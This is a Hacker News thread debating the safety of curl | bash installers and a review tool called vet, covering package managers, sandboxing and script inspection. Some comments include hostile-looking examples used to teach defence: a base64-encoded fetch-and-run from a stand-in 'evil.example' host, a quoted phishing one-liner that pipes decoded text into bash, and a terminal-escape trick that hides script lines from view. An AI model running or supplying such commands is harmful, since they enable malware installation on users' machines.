Vet is a safety net for the curl | bash pattern

209 mooreds 189 7/24/2025, 12:47:29 PM github.com ↗


pxeger1 · 1d ago
My problem with curl|bash is not that the script might be malicious - the software I'm installing could equally be malicious. It's that it may be written incompetently, or just not with users like me in mind, and so the installation gets done in some broken, brittle, or non-standard way on my system. I'd much rather download a single binary and install it myself in the location I know it belongs in.
jerf · 1d ago
I've also seen really wonderfully-written scripts that, if you read them manually, allow you to change where whatever it is is installed, what features it may have, optional integration with Python environments, or other things like that.

I at least skim all the scripts I download this way before I run them. There's just all kinds of reasons to, ranging all the way from the "is this malicious" to "does this have options they're not telling me about that I want to use".

A particular example is that I really want to know if you're setting up something that integrates with my distro's package manager or just yolo'ing it somewhere into my user's file system, and if so, where.

inetknght · 1d ago
> I've also seen really wonderfully-written scripts that

I'll take a script that passes `shellcheck ./script.sh` (or, any other static analysis) first. I don't like fixing other people's bugs in their installation scripts.

After that, it's an extra cherry on top to have everything configurable. Things that aren't configurable go into a container and I can configure as needed from there.
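For a concrete taste of the bug class a linter catches, here's a minimal sketch of shellcheck's SC2086 warning (unquoted expansion word-splits); the `my downloads` directory is just an illustration:

```shell
# SC2086 in action: an unquoted variable splits on whitespace.
dir="my downloads"
mkdir -p "$dir"
unquoted=$(ls -d $dir 2>/dev/null || echo "BROKEN")  # splits into paths "my" and "downloads"
quoted=$(ls -d "$dir")                               # correct: one path
echo "$unquoted vs $quoted"
```

An install script with this bug works fine until a user has a space in a path, which is exactly the "written without users like me in mind" failure mode.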

sim7c00 · 1d ago
right? read before u run. if you cant make sense of it all, dont run. if you can make sense of it all, you're free to refactor it to your own taste :) saves some time usually. as you say, a lot are quite nicely written
groby_b · 1d ago
> read before u run

Lovely sentiment, not applicable when you actually work on something. You read your compiler/linker, your OS, and all libraries you use? Your windowing system? Your web browser? The myriad utilities you need to get your stuff done? And of course, you've read "Reflections on trusting trust" and disassembled the full output of whatever you compile?

The answer is "you haven't", because most of those are too complex for a single person to actually read and fully comprehend.

So the question becomes: how do you extend trust? What makes a shell script untrustworthy, but the executable you or the script install trustworthy?

homebrewer · 11h ago
Non-system software, which is what often gets installed with this method, typically does not get root privileges on my systems, or at least is not expected to write anything into directories like /usr.

These scripts are often written by people who only know one OS well (if any), and if that OS is macOS, and you're on Linux (or FreeBSD, or whatever), you can expect them to do weird shit like sticking binaries into /usr/bin in circumvention of the package manager, or adding their own package repositories without asking you (and often not whitelisting just their packages, which allows them to e.g. replace glibc on your system without you noticing), etc.

It's not comparable to simply using the already installed software.

jerf · 7h ago
"What makes a shell script untrustworthy, but the executable you or the script install trustworthy?"

Supply-chain attacks. Linux distros have a long history of being more hardened targets than "a static file on some much, much, much smaller project's random server".

Also things like linux packages or snaps or flatpaks are generally somewhat ringfenced by their nature. Here I don't mean for security reasons per se, but just by their nature, I have confidence a flatpak isn't going to start scribbling all over my user directory. A script may make any number of assumptions about what it is OK to do, where things can go, where to put them, what it can install, etc.

"Trust" isn't just about whether something is going to steal my cryptowallet or install a keylogger. It's about whether it breaks my reproducible ops setup, or will stick configuration in the seventeenth place in my system, or assumes other false things about how I want it set up that may cause other problems.

spookie · 22h ago
Binaries in the Linux world are usually retrieved the "Official Way". You use a distro. Therefore you trust "them" and how they operate their package manager.

This is the "Unofficial Way".

sim7c00 · 13h ago
well, read before u run was obviously for the shell script, not gcc sources :'l. i dont think thats a fair comparison. but you do make a good point. its why i write my own OS :D and yes, once that is up, own toolchain would be next, as an experiment to see what'd be needed to be secure, even forgetting ofc the hw we run on. wasnt planning to play with horrible acids to see what is in there, tho its possible.. :D (it will never be finished in my life haha, i know...).
AndyMcConachie · 1d ago
100% agree. The question of whether I should install lib-X for language-Y using Y's package management system or the distribution's package management system is unresolved.
Diti · 1d ago
It’s solved by Nix. Whichever package management you choose (nixpkgs or pip or whatever), the derivation should have the same hash in the Nix store.

(Nix isn’t the solution for OP’s problems though – Nix packages are unsigned, so it’s basically backdoor-as-a-service.)

ants_everywhere · 18h ago
The Nix installer is one of the more shocking curl | bash experiences I've had.

It created users and groups on my system! And the uninstall script didn't clean it up.

mingus88 · 1d ago
My problem with it is that it encourages unsafe behavior.

How many times will a novice user follow that pattern before some jerk on Discord drops a curl|bash and gets hits?

IRC used to be a battlefield for these kinds of tricks, and we have legit projects like homebrew training users that it’s normal to raw dog arbitrary code directly into your environment

SkiFire13 · 1d ago
What would you consider a safer behaviour for downloading programs from the internet?
mingus88 · 1d ago
You are essentially asking what is safer than running arbitrary code from the internet sight unseen directly into your shell and I guess my answer would be any other standard installation method!

The OS usually has guardrails and logging and audits for what is installed but this bypasses it all.

When you look at this from an attacker’s perspective, it’s heaven.

My mom recently got fooled by a scammer that convinced her to install remote access software. This curl pattern is the exact same vector, and it’s nuts to see it become commonplace

SkiFire13 · 9h ago
> You are essentially asking what is safer than running arbitrary code from the internet

No, I'm asking what is a safer method when I want to install some code from the internet.

> The OS usually has guardrails and logging and audits for what is installed but this bypasses it all.

Not everything is packaged or up-to-date in the OS

> My mom recently got fooled by a scammer that convinced her to install remote access software.

Remote access software is packaged in distros too.

thayne · 16h ago
> My mom recently got fooled by a scammer that convinced her to install remote access software.

But I bet she didn't install it with curl piped to bash. The point isn't that curl|bash is safe, but that it isn't inherently more dangerous than downloading and running a program.

thewebguyd · 1d ago
Use your distro's package manager and repos first and foremost. Flatpak is also a viable alternative to distribution, and if enabled, comes along with some level of sandboxing at least.

"Back in the day" we cloned the source code and compiled ourself instead of distributing binaries & install scripts.

But yeah, the problem around curl | bash isn't the delivery method itself, it's the unsafe user behavior that generally comes along with it. It's the *nix equivalent of downloading an untrusted .exe from the net and running it, and there's no technical solution for educating users to be safe.

Safer behavior IMO would be to continue to encourage the use of immutable distros (Fedora Silverblue and others). RO /, user apps (mostly) sandboxed, and if you do need to run anything untrusted, it happens inside a distrobox container.

BHSPitMonkey · 23h ago
I've installed untold thousands of .deb packages in my lifetime - often "officially" packaged by Debian or Ubuntu, but in many cases also from a software vendor's own apt repository.

Almost every one contains preinst or postinst scripts that are run as root, and yet I can count on zero hands the number of times I've opened one up first to see what it was actually doing.

At least a curlbash that doesn't prompt me for my password is running as an unprivileged user! /shrug
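You can, though, read those maintainer scripts before installing. A sketch, assuming `dpkg-deb` is available; the demo package is fabricated locally just to have something to inspect:

```shell
# Build a toy .deb with a postinst, then read the postinst without installing anything.
mkdir -p pkg/DEBIAN
printf 'Package: demo\nVersion: 1.0\nArchitecture: all\nMaintainer: nobody\nDescription: demo\n' > pkg/DEBIAN/control
printf '#!/bin/sh\necho "postinst would run as root"\n' > pkg/DEBIAN/postinst
chmod 755 pkg/DEBIAN pkg/DEBIAN/postinst
dpkg-deb -b pkg demo.deb >/dev/null 2>&1
postinst=$(dpkg-deb -I demo.deb postinst)   # print a named control member
echo "$postinst"
```

The same `dpkg-deb -I` works on any downloaded .deb, so the "I never look" habit is convenience, not a tooling gap.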

SkiFire13 · 9h ago
Getting every piece of software into every distro is not feasible; it's an NxM problem. Sometimes this encourages the use of third-party repositories, which I would argue is even less safe because it requires root access.

Flatpak is a nice suggestion but unfortunately it doesn't seem to work nicely for CLIs.

> "Back in the day" we cloned the source code and compiled ourself instead of distributing binaries & install scripts.

Isn't that the same thing with the extra step of downloading a git repo?

sim7c00 · 1d ago
a lot of useful packages are not in package managers, or are in old versions that lack features u need. so its quite common to need to get around that...
papichulo2023 · 1d ago
Funny enough, clone-and-compile is easier now than ever before. You can ask an LLM to create a Dockerfile to compile any random program and most of the time it will be okay.
hsbauauvhabzb · 1d ago
R/O root means a binary will fail to install, but won’t stop my homedir being backdoored, in addition to the huge waste of time that attempting an R/O root would be.
bawolff · 1d ago
Literally anything else.

Keep in mind that its possible to detect when someone is doing curl | bash and only send the malicious code when curl is being piped, to make it very hard to detect.

SoftTalker · 1d ago
    curl | tee foo.sh

and then inspect foo.sh and then (maybe) `cat foo.sh | bash`

Does that avoid the issue?
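One small addition makes this safer still: checksum the file you reviewed, so the bytes you run are provably the bytes you read. A sketch, with `printf` standing in for the actual curl download:

```shell
# Save, review, pin, then run the exact file you reviewed.
printf 'echo hello from installer\n' > foo.sh    # stand-in for: curl ... | tee foo.sh
sha256sum foo.sh > foo.sh.sha256                 # record what you inspected
sha256sum -c foo.sh.sha256                       # re-verify just before running
result=$(bash foo.sh)
echo "$result"
```

This sidesteps the server-side pipe-detection trick entirely: the server only ever sees a plain download, and the script can't change between review and execution.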

broken-kebab · 1d ago
Yes, but will you do it really?
codedokode · 1d ago
Software should run in a sandbox. Look at Android for example.
troupo · 1d ago
> My problem with it is that it encourages unsafe behavior.

Then why don't Linux distributions encourage safe behaviour? Why do you still need sudo permissions to install anything on most Linux systems?

> How many times will a novice user follow that pattern until some jerk on discord

I'm not a novice user and I will use this pattern because it's frankly easier and faster, especially when the current distro doesn't have some combination of things installed, or doesn't have certain packages, or...

keyringlight · 1d ago
I think a lot of this comes down to assumptions about the audience and something along the lines of "it's not a problem until it is". It's one aspect I wonder about with migrants from Windows, and all the assumptions or habits they bring with them. Microsoft has been trying to put various safety rails around users for the past 20 years, since they started taking security more seriously with XP, and that gets pushback every time they try to restrict or warn.
ChocolateGod · 23h ago
> Why do you still need sudo permissions to install anything on most Linux systems?

You don't with Flatpak or rootless containers, that's partially why they're being pushed so much.

They don't rely on setuid for it either

johnisgood · 22h ago
Flatpak and AppImage.

Or download & compile & install to a PREFIX (e.g. ~/.local/pkg/), and use a symlink manager to install to e.g. ~/local (and set MANPATH accordingly, too). Make sure PATH contains ~/.local/bin, etc. It does not work with Electron apps though. I do `alias foo='cd ... && ./foo'`.
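A sketch of that prefix-plus-symlink flow, with a fake `foo` script standing in for a real `./configure --prefix=... && make install` (GNU Stow is one example of a symlink manager that automates the link step):

```shell
# Install into a versioned per-user prefix, then link into a dir that's on PATH.
PREFIX="$HOME/.local/pkg/foo-1.0"
mkdir -p "$PREFIX/bin" "$HOME/.local/bin"
printf '#!/bin/sh\necho foo 1.0\n' > "$PREFIX/bin/foo"   # stand-in for a compiled binary
chmod +x "$PREFIX/bin/foo"
ln -sf "$PREFIX/bin/foo" "$HOME/.local/bin/foo"          # what a symlink manager automates
PATH="$HOME/.local/bin:$PATH"
version=$(foo)
echo "$version"
```

Uninstalling is then `rm -rf` of one prefix directory plus removing the symlinks, which is the guaranteed-uninstall property curl|bash scripts rarely give you.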

aragilar · 11h ago
Because you're making system-wide changes which affect more than just your user?

There are, and have been, distros that install per user, but at some level something needs to manage the hardware and interfaces to it.

troupo · 7h ago
> Because you're making system-wide changes which affect more than just your user?

Am I? How am I affecting other users by installing something for myself?

Even Windows has had "Install just for this user or all users?" for decades

mingus88 · 19h ago
I’m not a novice user anymore either, but I care about my security and privacy.

When I see a package from a repo, I have some level of trust. Same with a single binary from GitHub.

When I see a curl|bash I open it up and look at it. Who knows what the heck it’s doing. It does not save me any time, and in fact is a huge waste of time to wade through random shell scripts which follow a dozen different conventions, because shell is ugly.

Yes you could argue an OS package runs scripts too that are even harder to audit but those are versioned and signed and repos have maintainers and all kinds of things that some random http GET will never support.

You don’t care? Cool. Doesn’t mean it’s good or safe or even convenient for me.

troupo · 6h ago
Repos and maintainers etc. are just a long unauditable supply chain [1]. And everyone is encouraged to blindly trust this chain with sudo access.

It's worse than that. If your distro doesn't have some package, you're encouraged to just add PPA repos and blindly trust those.

Quite a few companies run their own repos as well, and adding their packages is again `sudo add repo; sudo install`

Yes, it's not as egregious as just `curl | bash`, but it's not as far removed from it as you think.

[1] E.g. https://en.wikipedia.org/wiki/XZ_Utils_backdoor

umanwizard · 23h ago
> Why do you still need sudo permissions to install anything on most Linux systems

Not guix :)

One of the coolest things about it.

IgorPartola · 23h ago
This exactly. You never know what it will do. Will it simply check that you have Python and virtualenv and install everything into a single directory? Or will it hijack your system by adding trusted remote software repositories? Will it create new users? Open network ports? Install an old version of Java it needs? Replace system binaries for “better” ones? Install Docker?

Operating systems already have standard ways of distributing software to end users. Use it! Sure maybe it takes you a little extra time to do a one off task of adding the ability to build Debian packages, RPM, etc. but at least your software will coexist nicely with everything else. Or if your software is such a prima-donna that it needs its own OS image, package it in a Docker container. But really, just stop trying to reinvent the wheel (literally).

stouset · 1d ago
Yes! What I really want from something like this is sandboxing the install process to give me a guaranteed uninstall process.
mjmas · 22h ago
tinycorelinux reinstalls its extensions into a tmpfs every boot which works nicely. (and you can have different lists of extensions that get loaded)
hsbauauvhabzb · 1d ago
Why would you possibly want to remove my software?
ChocolateGod · 23h ago
This reminded me how, if you wanted to remove something like cPanel back in the day, your only real option was to just reinstall the whole OS.
1vuio0pswjnm7 · 22h ago
Many times a day both in scripts and interactively I use a small program I refer to as "yy030" that filters URLs from stdin. It's a bit like "urlview" but uses less complicated regex and is faster. There is no third party software I use that is distributed via "curl|bash" and in practice I do not use curl or bash, however if I did I might use yy030 to extract any URLs from install.sh something like this

    curl https://example.com/install.sh|yy030
or

    curl https://example.com/install.sh > install.sh
    yy030 < install.sh
Another filter, "yy073", turns a list of URLs into a simple web page. For example,

    curl https://example.com/install.sh|yy030|yy073 > 1.htm
I can then open 1.htm in an HTML reader and select any file for download or processing by any program according to any file associations I choose, somewhat like "urlview".

I do not use "fzf" or anything like that. yy030 and yy073 are small static binaries under 50k that compile in about 1 second.

I also have a tiny script that downloads a URL received on stdin. For example, to download the third URL from install.sh to 1.tgz

     yy030 < install.sh|sed -n 3p|ftp0 1.tgz
"ftp" means the client is tnftp

"0" means stdin

nikisweeting · 23h ago
This is always the beef that I've had with it. Particularly the lack of automatic updates and enforced immutable monotonic public version history. It leads to each program implementing its own non-standard self-updating logic instead of just relying on the system package managers. https://docs.sweeting.me/s/against-curl-sh
shadowgovt · 1d ago
Much of the reason `curl | bash` grew up in the Linux ecosystem is that "single binary that just runs" approach isn't really feasible (1) because the various distros themselves don't adhere to enough of a standard to support it. Windows and MacOS, being mono-vendor, have a sufficiently standardized configuration that install tooling that just layers a new application into your existing ecosystem is relatively straightforward: they're not worrying about what audio subsystem you installed, or what side of the systemd turf war your distro landed on, or which of three (four? five?) popular desktop environments you installed, or whether your `/dev` directory is fully-populated. There's one answer for the equivalent of all those questions on Mac and Win so shoving some random binary in there Just Works.

Given the jungle that is the Linux ecosystem, that bash script is doing an awful lot of compatibility verification and alternatives selection to stand up the tool on your machine. And if what you mean is "I'd rather they hand me the binary blob and I just hook it up based on a manifest they also provided..." Most people do not want to do that level of configuration, not when there are two OS ecosystems out there that Just Work. They understandably want their Linux distro to Just Work too.

(1) feasible traditionally. Projects like snap and flatpak take a page from the success Docker has had and bundle the executable with its dependencies so it no longer has to worry about what special snowflake your "home" distro is, it's carrying all the audio / system / whatever dependencies it relies upon with it. Mostly. And at the cost of having all these redundant tech stacks resident on disk and in memory and only consolidateable if two packages are children of the same parent image.

fouc · 1d ago
I first encountered `curl | bash` in the macOS world, most specifically with installing the worst package manager ever, homebrew, which first came out in 2009. Since then it's spread.

I call it the worst because it doesn't support installing specific versions of libraries, doesn't support downgrading, etc. It's basically hostile and forces you to constantly upgrade everything, which invariably leads to breaking a dependency and wasting time fixing that.

These days I mostly use devbox / nix at the global level and mise (asdf compatible) at the project level.

ryandrake · 1d ago
Ironic, because macOS's package management system is supposed to be the simplest of all! Applications are supposed to just live in /Applications or ~/Applications, and you're supposed to be able to cleanly uninstall them by just deleting their single directory. Not all 3rd party developers seem to have gotten that memo, and you frequently see crappy and unnecessary "installers" in the macOS world.

There may be good or bad reasons why Homebrew can't use the standard /Applications pattern, but did they have to go with "curl | bash"?

Wowfunhappy · 1d ago
The Applications folder system does work really well for GUI apps! It's not really made for command line apps.

For command line apps, the equivalent would probably be statically-compiled binaries you can just drop somewhere in your PATH, e.g. /usr/local/bin/. For programs that are actually built this way (which I would personally call "the correct way") this works great!

Nab443 · 20h ago
I would not call statically built apps "the correct way". It offers benefits but also drawbacks. One of them is that you can't update statically linked libraries with security fixes without replacing the binary completely, which can be an issue if the context does not allow it (unsupported proprietary software, lost dependency code, ...). It can also lead to faster resource consumption, which can be an issue in resource-constrained systems.
int_19h · 15h ago
If the app is actively maintained, it will update the dependency to fix the security issue.

If the app is not actively maintained, unless trivial, it likely has unpatched vulnerabilities of its own anyway.

And on macOS, if the app is not actively maintained, it usually breaks after a couple major releases regardless of anything else, because Apple doesn't believe in backwards compatibility.

Wowfunhappy · 20h ago
I know, I said that I would call it the correct way. :) I'm aware of the drawbacks, I just think they're clearly outweighed by the benefits.

If nothing else, consider that the limitations of a statically linked binary match those of a traditional Mac application bundle. While Mac apps are usually dynamically linked, they also include all of their dependencies within the app bundle. I suppose you could argue it's technically possible to open an app bundle and replace one of the dylibs, but this is clearly not an intended use case; if nothing else, you're going to break the code signature.

thewebguyd · 1d ago
> Not all 3rd party developers seem to have gotten that memo

This frustrates me to no end on macOS. Not only do you see crappy installers like you said, but a ton of applications now aren't even self contained in ~/Applications like they should be.

Apps routinely shit all over ~/Library when they don't need to, and don't clean up after themselves, so while deleting the bundle technically 'uninstalls' it, you still have stuff left over, and it can eat up disk space fast. Same crap that Windows installers do, where they'll gladly spread the app all over your file system and registry, but the uninstaller doesn't actually keep track of what went where, so it'll routinely miss stuff. At least Windows has a built-in disk cleanup tool that can recognize some of this for you; macOS will just happily let apps abuse your file system until you have to go digging.

Package managers on Linux solved this problem many, many years ago and yet we've all collectively decided to just jump on the curl | bash train and toss the solution to the curb because...reasons?

ryandrake · 1d ago
Yep, same problem on Windows. It's almost always a mistake to give 3rd party developers unrestricted access to your filesystem, because they don't care and will shit their files all over it.

I wish more applications were distributed by the Mac App Store, because I believe App Store distributed apps are more strongly sandboxed and may not allow developers to abuse your system like this.

ChocolateGod · 23h ago
Mac apps outside the app store can still be sandboxed, but they have to be signed.
shadowgovt · 1d ago
"Reasons" is "Nobody wants to wait for the package maintainers to decide that their favorite new shiny toy is enough a priority to update it to a version recent enough to match the online documentation for the new shiny toy," mostly.

As I mentioned somewhere side-thread: Debian Unstable is only three minor versions behind the version of Rust that the Rust team is publishing as their public release, but Debian Stable is three years old. For some projects, that's dinosaur-times speed. If I want to run Debian Stable for everything except Rust, I'm curl-bashing it.

ryandrake · 1d ago
As a user, if you need to run recent versions of your tools, I'd argue Debian (at least Debian Stable) is not for you. Luckily we have many choices among Linux distributions!
int_19h · 15h ago
There's nothing wrong with Debian for running recent versions of your dev tools; you just shouldn't expect to get them from the official Debian repositories. But there are third-party repositories for things like e.g. latest Node versions. I would expect there to be something for Rust, as well, but apparently they are also packaging rustup now.
CharlesW · 1d ago
> …did they have to go with "curl | bash"?

That's one of many options, documented at the first text link of the home page. https://docs.brew.sh/Installation

ryandrake · 1d ago
Wow, they even have a .pkg installer. Had no idea. Is this new?
CharlesW · 1d ago
Without going too far down the rabbit hole, it looks like the maintainers added it in 2023. In the process, I was reminded that the installer initially required Ruby! (`/usr/bin/ruby -e "$(curl…)"`)

FYI, mas is the equivalent of a package manager for macOS apps (a.k.a. a CLI for App Store). https://github.com/mas-cli/mas

Other than brew, I use mise for everything I can. https://mise.jdx.dev/

tghccxs · 1d ago
Why is homebrew the worst? Do you have a recommendation for something better? I default to homebrew out of inertia but would love to learn more.
xmodem · 1d ago
I've been using MacPorts since before homebrew existed and never switched away.
fouc · 1d ago
Lately I've been using devbox (nix wrapper) for my homebrew-like needs via "devbox global add <whatever>", for project specific setup I stick with mise (asdf-compatible).

I don't like homebrew because I've been burnt multiple times because it often auto-updates when you least want it to and breaks project dependencies.

And there's no way to downgrade to a specific version. Real package managers typically support versioning.

antihero · 1d ago
If you're depending on specific versions, don't use a general system package manager, use something like mise or asdf.
CharlesW · 1d ago
MacPorts is a good alternative, but you'll find that Homebrew is absolutely not the worst. Personally, I find brew fast and reliable. Look at mise (`brew install mise`) for managing any developer dependencies. https://mise.jdx.dev/
ryao · 1d ago
I am a fan of Gentoo Prefix. Others like pkgsrc.
fouc · 17h ago
I've heard of some people using pkgsrc as their package manager in macOS. First time I heard about Gentoo Prefix. neat!
chme · 1d ago
nix is possible with lix, if you can stomach nix syntax.
fouc · 17h ago
devbox is a nice wrapper for nix syntax. thanks for the tip about lix, it looks like I can use devbox+lix instead of the determinate nix installer.
snickerdoodle12 · 1d ago
apt and yum/dnf are pretty great
JoshTriplett · 20h ago
Statically link a binary with musl, and it'll work on the vast majority of systems.

> they're not worrying about what audio subsystem you installed

Some software solves this by autodetecting an appropriate backend, but also, if you use alsa, modern audio systems will intercept that automatically.

> what side of the systemd turf war your distro landed on

Most software shouldn't need to care, but to the extent it does, these days there's systemd and there's "too idiosyncratic to support and unlikely to be a customer". Every major distro picked the former.

> or which of three (four? five?) popular desktop environments you installed

Again, most software shouldn't care. And `curl|bash` doesn't make this any easier.

> or whether your `/dev` directory is fully-populated

You can generally assume the devices you need exist, unless you're loading custom modules, in which case it's the job of your modules to provide the requisite metadata so that this works automatically.

networked · 1d ago
You can also use vipe from moreutils:

  curl -sSL https://example.com/install.sh | vipe | sh
This will open the output of the curl command in your editor and let you review and modify it before passing it on to the shell. If it seems shady, clear the text.

vet looks safer. (Edit: It has the diff feature and defaults to not running the script. However, it also doesn't display a new script for review by default.) The advantage of vipe is that you probably have moreutils available in your system's package repositories or already installed.

TZubiri · 1d ago
Huh

Why not just use the tools separately instead of bringing in a third tool for this?

    curl -o script.sh https://example.com/install.sh
    cat script.sh
    bash script.sh

What a concept

networked · 1d ago
What it comes down to is that people want a one-liner. Telling them they shouldn't use a one-liner doesn't work. Therefore, it is better to provide a safer one-liner.

This assumes that securing `curl | sh` separately from the binaries and packages the script downloads makes sense. I think it does. Theoretically, someone can compromise your site http://example.com with the installation script https://example.com/install.sh but not your binary downloads on GitHub. Reviewing the script lets the user notice that, for example, the download is not coming from the project's GitHub organization.

bawolff · 1d ago
If you are really paranoid you should use cat -v, as otherwise terminal control characters can hide the malicious part of the script.
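A quick demo of the trick: the SGR "conceal" escape (`ESC[8m`) can render a line invisibly on many terminals, while `cat -v` shows the escape bytes as `^[` instead of sending them to the terminal:

```shell
# A hidden line: ESC[8m tells many terminals to render the following text invisibly.
printf 'echo safe\n\033[8mecho hidden\033[0m\n' > demo.sh
shown=$(cat -v demo.sh)   # escape bytes become visible as ^[[8m ... ^[[0m
echo "$shown"
```

A plain `cat demo.sh` would pass those bytes through, and the "hidden" line could vanish from view while still being perfectly executable.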
panki27 · 23h ago
At this point, the whole world is just a complexity Olympiad
adolph · 1d ago
Same but less instead of cat so my fingers stay in the keyboard.

Vet, vipe, etc. are kind of like kitchen single-taskers, like avocado slicer-scoopers. Surely some people get great value out of them, but a table knife works just fine for me and is useful in many task flows.

I'd get more value out of a cross-platform copy-paster so I'm not skip-stepping in my mind between pbpaste and xclip.

hsbauauvhabzb · 1d ago
Have you tried aliases?
adolph · 1d ago
For pbpaste/pbcopy and xclip? I've considered it and haven't decided how to do it yet given differences in how they work. Do you have one?

https://linux.die.net/man/1/xclip

https://ss64.com/mac/pbcopy.html

https://man.openbsd.org/xclipboard.1

procaryote · 21h ago
I do

    if ! which pbcopy &> /dev/null; then
        alias pbcopy="xclip -selection clipboard"
        alias pbpaste="xclip -o -selection clipboard"
    fi
The `if` bit is so it only adds the alias if there isn't a `pbcopy`, so I can use the same dotfile on mac and linux
hsbauauvhabzb · 19h ago
I’m honestly not familiar with pbcopy, but I imagine you could make a relatively consistent wrapper in python if a simple alias does not work. Are you able to give some example shell code of what you’d like to be consistent?
jjgreen · 1d ago
Splendid idea, especially since "curl | bash" can be detected on the server [1] (which if compromised could serve hostile content to only those who do it)

[1] https://web.archive.org/web/20250622061208/http://idontplayd...

IshKebab · 1d ago
This is one of those theoretical issues that has absolutely no practical implications.
dgl · 19h ago
Here's an example of a phish actually using it: https://abyssdomain.expert/@filippo/114868224898553428 (also note "cat" is potentially another antipattern, less -U or cat -v is what you want).
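The nice property of that phish format is that it can be inspected without executing anything: pipe the payload to `base64 -d` and stop there. A sketch with a fabricated payload (the URL is illustrative):

```shell
# Decode the payload instead of piping it to bash.
payload=$(printf '%s\n' 'curl -fsSL https://evil.example/x.sh | bash' | base64)
decoded=$(printf '%s\n' "$payload" | base64 -d)   # reveals the command without running it
echo "$decoded"
```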
IshKebab · 2h ago
Sure, so how many people do you think saw `echo "Y3Vy[...]ggJg==" | base64 -d | bash` and thought "hmm, that's suspicious, I'd better check what it is doing... Ah, it's curling another bash script. I'd better see what that script is. Downloads script. Ah I see, a totally legit script. All is well, I'll run the command!"

It's zero. Zero people. Nobody is competent enough to download and review a bash script and also not recognise this obvious scam.

They probably threw the pipe detection in just because they could (and because it's talked about so frequently).

falcor84 · 1d ago
Yes, ... but if the server is compromised, they could also just inject malware directly into the binary that it's installing, right? As I see it, at the end of the day you're only safe if you're directly downloading a package whose hash you can confirm via a separate trusted source. Anything else puts you at the mercy of the server you're downloading from.
sim7c00 · 1d ago
depending on what you run one method might have more success than another. protections for malicious scripts vs. modified binaries are often different tools or different components of the same tool that can have varying degrees of success.

you could also use the script to fingerprint and beacon to check if the target is worth it, and what you might want to inject into said binary if that's your pick.

still i think i agree, if you're gonna trust a binary from that server or a script, it's potato potato...

check what you run before you run it with whatever tools or skills you've got and hope for the best.

if you go deep enough into this rabbithole, you can't trust your hard disk or network card etc. so at some point it's just impossible to do anything. microcode patches, malicious firmwares, whatever.

for pragmatic reasons a line needs to be drawn. if you're paranoid, good luck and don't learn too much about cybersecurity, or you will need to build your own computer :p

baq · 1d ago
we've been curl | bashing software on windows since forever, it was called 'downloading and running an installer' and yes, there was the occasional malware. the solution to that was antivirus software. at this point even the younger hners should see how the wheel of history turns.

meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

inanutshellus · 1d ago
> meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

Well... sometimes like, say, yesterday [1], there's a second thought...

  [1] https://www.bleepingcomputer.com/news/security/npm-package-is-with-28m-weekly-downloads-infected-devs-with-malware/
simonw · 1d ago
"the solution to that was antivirus software"

How well did that work out?

thewebguyd · 1d ago
> How well did that work out?

Classic old school antivirus? Not great, but did catch some things.

Modern EDR systems? They work extremely well when properly set up and configured across a fleet of devices as it's looking for behavior and patterns instead of just going off of known malware signatures.

maccard · 22h ago
My last job had a modern endpoint detection system running on it and my 7 year old MacBook was as quick as my top of the line i9 processor because of it. I have never seen software destroy a systems performance as much as carbon black, crowdstrike and cortex do.

They’re also not exactly risk free - [0]

[0] https://en.m.wikipedia.org/wiki/2024_CrowdStrike-related_IT_...

panki27 · 23h ago
If modern EDR systems are so great without relying on classical signature matching, then why are they still doing it? Why do they keep fetching "definition databases" as often as possible?

... because it's the only thing that somewhat works. From my personal experience, the heuristic and "AI-based" approaches lead to so many false positives, it's not even worth pursuing them.

The best AV remains and will always be common sense.

esafak · 1d ago
Great. It motivated me to drop kick Windows and move to Linux and MacOS.
nicce · 1d ago
Do you know how deeply integrated anti-virus is on macOS?
esafak · 1d ago
No, and I haven't encountered a virus either. During the Microsoft era viruses frequently did the rounds, becoming water cooler talk.
maccard · 22h ago
That’s mostly because applications themselves got way more secure.
bongodongobob · 1d ago
As someone who manages 1000s of devices, great.
Cthulhu_ · 1d ago
"everyone else" is using an app store that has (read: should have) vetted and reviewed applications.
tonymet · 21h ago
windows has had ACLs and security descriptors for 20+ years. Linux is a super user model.

Windows Store installs (about 75% of installs) are sandboxed and no longer need escalation.

The remaining privileged installs that prompt with UAC modal are guarded by MS Defender for malicious patterns.

Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo can access almost all memory, raw device access, and anywhere on disk.

eredengrin · 14h ago
> Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo can access almost all memory, raw device access, and anywhere on disk.

They didn't say anything about sudo, so assuming global filesystem/memory/device/etc access is not really a fair comparison. Many installers that come as bash scripts don't require root. There are definitely times I examine installer scripts before running them, and sudo is a pretty big determining factor in how much examination an installer will get from me (other factors include the reputation of the project, past personal experience with it, whether I'm running it in a vm or container already, how I feel on the day, etc).

tonymet · 4h ago
Even comparing non-sudo / non-privileged installs, Windows OS & Defender have many more protections. Controlled Folder Access restricts access to most of the home directory, and Defender real-time protection is running during install and execution. Windows stores secrets in the TPM, which isn't used on the Linux desktop. The surface area for malicious code is much smaller.

A bash script is only guarded by file system permissions. All the sensitive content in the home directory is vulnerable. And running sudo embedded would mostly succeed.

ndsipa_pomu · 1d ago
At least with curl and bash, the code is human readable, so it's easy to inspect it as long as you have some basic knowledge of bash scripts.
fragmede · 1d ago
software running in docker's a bit more sandboxed than running outside of it, even if it's not bulletproof.
johnfn · 1d ago
Am I missing something? Even if you do `vet foobar-downloader.sh` instead of `curl foobar-downloader.sh | bash`, isn't your next command going to be to execute `foobar` regardless, "blindly trusting" that all the source in the `foobar` repository isn't compromised, etc?
lr0 · 1d ago
No, it says that it will show you the script first so you can review it. What I don't get is why you need a program for this: you can simply curl the script to a file, `cat` it, and review it.
simonw · 1d ago
It shows you the installation script but that doesn't help you evaluate if the binary that the script installs is itself safe to run.
dotancohen · 23h ago
Right, this tool does one thing - make it easy to see the script. Another tool does something else. That's kind of the UNIX Philosophy.
geysersam · 1d ago
Yes but even if you inspect the code of the installation script the program you just installed might still be compromised/malicious? It doesn't seem more likely that an attacker managed to compromise an installation script, than that they managed to compromise the released binary itself.
loloquwowndueo · 1d ago
If you're just going to run it blindly you don't need vet. It's not automatic - it just gives you a chance to review the script before running it.
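The core loop vet automates is small enough to sketch. This is not vet's actual code, just the shape of the pattern (the URL is a placeholder):

```shell
# fetch to a temp file, force a review step, then run only on explicit yes
vet_run() {
    tmp=$(mktemp) || return 1
    if ! curl -fsSL "$1" -o "$tmp"; then rm -f "$tmp"; return 1; fi
    ${PAGER:-less} "$tmp"                    # the review step
    printf 'Run it? [y/N] '
    read -r ans
    if [ "$ans" = y ]; then sh "$tmp"; fi
    status=$?
    rm -f "$tmp"
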